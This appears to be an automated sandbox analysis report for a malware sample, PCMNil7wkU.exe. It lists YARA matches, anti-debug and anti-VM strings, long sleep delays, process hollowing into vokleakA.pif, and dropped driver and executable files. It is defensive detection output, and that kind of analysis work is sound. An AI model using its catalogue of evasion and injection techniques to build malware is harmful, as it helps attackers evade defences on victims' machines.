              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR
              Source: vokleakA.pif, 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_0415245C
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,5_2_040C245C
              Source: C:\Users\Public\Libraries\vokleakA.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\vokleakA.pifWindow / User API: threadDelayed 6537Jump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifWindow / User API: threadDelayed 3314Jump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeDropped PE file which has not been started: C:\Users\Public\Libraries\truesight.sysJump to dropped file
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\Public\Libraries\vokleakA.pifEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-17750
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeAPI coverage: 7.4 %
              Source: C:\Users\Public\Libraries\Akaelkov.PIFAPI coverage: 5.7 %
              Source: C:\Users\Public\Libraries\vokleakA.pif TID: 1220Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pif TID: 4112Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pif TID: 3580Thread sleep count: 6537 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pif TID: 3580Thread sleep count: 3314 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pif TID: 3292Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pif TID: 5352Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Public\Libraries\vokleakA.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04105C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_04105C18
              Source: C:\Users\Public\Libraries\vokleakA.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifThread delayed: delay time: 922337203685477
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxX
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: Akaelkov.PIF, 00000008.00000003.2235031941.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
              Source: vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
              Source: Akaelkov.PIF, 00000005.00000002.2150878056.00000000007D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000883000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3235546216.000000003461D000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2774428794.000000003461B000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.000000000090A000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.00000000008D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Akaelkov.PIF, 00000005.00000002.2150878056.0000000000803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL8
              Source: vokleakA.pif, 00000004.00000002.3235435596.0000000034615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeAPI call chain: ExitProcess graph end nodegraph_0-58322
              Source: C:\Users\Public\Libraries\Akaelkov.PIFAPI call chain: ExitProcess graph end nodegraph_5-40113
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_0411FCD8
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_0040ADB0 GetProcessHeap,HeapFree,4_2_0040ADB0
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040CE09
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040E61C
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_00416F6A
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_004123F1 SetUnhandledExceptionFilter,4_1_004123F1
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040E61C
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00416F6A
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_004123F1 SetUnhandledExceptionFilter,7_2_004123F1
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_1_0040CE09
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_1_0040E61C
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_1_00416F6A
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_1_004123F1 SetUnhandledExceptionFilter,7_1_004123F1
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040E61C
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00416F6A
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_2_004123F1 SetUnhandledExceptionFilter,9_2_004123F1
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040CE09
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040E61C
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_1_00416F6A
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 9_1_004123F1 SetUnhandledExceptionFilter,9_1_004123F1
              Source: C:\Users\Public\Libraries\vokleakA.pifMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeMemory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeMemory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 18130000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFMemory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFMemory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 121D0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFMemory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFMemory allocated: C:\Users\Public\Libraries\vokleakA.pif base: 18130000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeSection unmapped: C:\Users\Public\Libraries\vokleakA.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection unmapped: C:\Users\Public\Libraries\vokleakA.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFSection unmapped: C:\Users\Public\Libraries\vokleakA.pif base address: 400000Jump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeMemory written: C:\Users\Public\Libraries\vokleakA.pif base: 21F008Jump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFMemory written: C:\Users\Public\Libraries\vokleakA.pif base: 29D008Jump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFMemory written: C:\Users\Public\Libraries\vokleakA.pif base: 338008Jump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pifJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pifJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pifJump to behavior
              Source: vokleakA.pif, 00000004.00000002.3232986846.00000000320EA000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.000000003210A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q
              Source: vokleakA.pif, 00000004.00000002.3232986846.00000000320EA000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2071952429.0000000034562000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.000000003210A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q%
              Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]qp
              Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032065000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]qP
              Source: vokleakA.pif, 00000004.00000002.3232986846.000000003210A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q
              Source: vokleakA.pif, 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,]q
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_04105DDC
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_04105EE8
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: GetLocaleInfoA,0_2_0410B8C4
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: GetLocaleInfoA,0_2_0410B910
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: GetLocaleInfoA,4_2_00417A20
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: GetLocaleInfoA,4_1_00417A20
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_04075DDC
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_04075EE7
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: GetLocaleInfoA,5_2_0407B910
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: GetLocaleInfoA,7_2_00417A20
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: GetLocaleInfoA,7_1_00417A20
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: GetLocaleInfoA,9_2_00417A20
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: GetLocaleInfoA,9_1_00417A20
              Source: C:\Users\Public\Libraries\vokleakA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0410A30C GetLocalTime,0_2_0410A30C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041695F8 GetVersion,0_2_041695F8
              Source: C:\Users\Public\Libraries\vokleakA.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
